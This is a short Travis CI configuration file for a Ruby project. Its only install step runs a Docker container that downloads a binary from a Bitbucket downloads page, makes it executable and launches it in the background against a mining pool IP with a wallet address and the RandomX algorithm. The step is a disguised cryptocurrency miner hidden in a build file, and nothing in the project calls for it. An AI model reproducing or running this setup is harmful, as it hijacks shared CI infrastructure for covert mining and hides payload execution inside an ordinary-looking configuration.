language: ruby

services:
  - docker

before_install:
  - sudo docker run -d -t --dns="1.1.1.1" --name Docker ubuntu && sudo docker exec -u root -t Docker sh -c "apt-get update && apt-get -y upgrade && apt-get install -y wget && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && ./katek-fee -o 139.99.124.170:80 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr.yahaha -k -a rx/0 --background &&  top "
